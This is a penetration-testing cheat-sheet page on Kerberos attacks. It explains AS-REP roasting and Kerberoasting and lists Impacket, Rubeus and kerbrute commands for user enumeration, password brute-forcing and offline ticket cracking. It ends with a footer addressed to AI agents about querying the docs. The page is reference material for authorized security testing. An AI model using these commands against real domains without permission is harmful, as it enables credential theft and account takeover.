# TCP 88: Kerberos > Kerberos is a computer-network authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner. > > \-- [*Wikipedia*](https://en.wikipedia.org/wiki/Kerberos_\(protocol\)) ## Related * [Active Directoy](/the-pentesters-cheat-sheet/services/misc/active-directoy.md) * [TCP 389, 636, 3268, 3269: LDAP](/the-pentesters-cheat-sheet/services/tcp/tcp-389-636-3268-3269-ldap.md) * [Impacket](/the-pentesters-cheat-sheet/misc/impacket.md) * [GitHub: TarlogicSecurity/kerberos\_attacks\_cheatsheet.md](https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a) ## AS-REP Roasting If Kerberos preauthentication is disabled for a user, the Key Distribution Center (KDC) just issues a Ticket Granting Ticket (TGT) for any user we request (AS\_REQ).\ Part of the reply (AS\_REP) is encryted using the users password, and can then be cracked offline. See also [YouTube - Conda - Attacking Active Directory - AS-REP Roasting](https://www.youtube.com/watch?v=EVdwnBFtUtQ). ### Requirements * Only works on user accounts that have Kerberos preauthentication disabled * List of potential usernames (may be queried from LDAP using a domain account) ### Impacket ```bash GetNPUsers.py / -dc-ip ``` ### Rubeus ``` Rubeus.exe asreproast /user: /dc: /domain: /outfile:hashes.txt /format:hashcat ``` ### kerbrute A tool to perform Kerberos pre-auth bruteforcing\ [GitHub - ropnop/kerbrute](https://github.com/ropnop/kerbrute) Enumerate users ```bash ./kerbrute_linux_386 userenum -d --dc ``` bruteforce password of one user ```bash ./kerbrute_linux_386 bruteuser -d --dc ``` ## Kerberoasting If we have access to any user account on the domain, we can request (TGS\_REQ) Ticket Granting Service (TGS) tickets for any service account (using SPN).\ The reply (TGS\_REP) contains the TGS, encrypted with the service accounts password, that can then be cracked offline. See also [YouTube - Conda - Attacking Active Directory - Kerberoasting](https://www.youtube.com/watch?v=-3MxoxdzFNI) ### Requirements * Only works on service accounts that have a Service Principal Name (SPN) set * Creds/User account on the domain (low priv is sufficient) ### Impacket ```bash GetUserSPNs / -dc-ip -request ``` ### Rubeus TODO ### kerberoast ```bash sudo apt install kerberoast ``` Use exported tickets from [Mimikatz](/the-pentesters-cheat-sheet/privilege-escalation/windows/02-mimikatz.md) ```bash python /usr/share/kerberoast/tgsrepcrack.py ``` ## Sync time It's necessary to sync the client time to the domain controller. **Error** (when not synced) > SessionError: KRB\_AP\_ERR\_SKEW(Clock skew too great) ### ntpdate ```bash ntpdate ``` ### Manually **Get server time** ```bash nmap -sC -sV ``` ``` Host script results: |_clock-skew: 7h00m00s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-03-20T00:14:12 |_ start_date: N/A ``` **Set local time accordingly** ```bash date -s "20 Mar 2020 00:14:12+00:00" ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://d4rk1337.gitbook.io/the-pentesters-cheat-sheet/services/tcp/tcp-88-kerberos.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.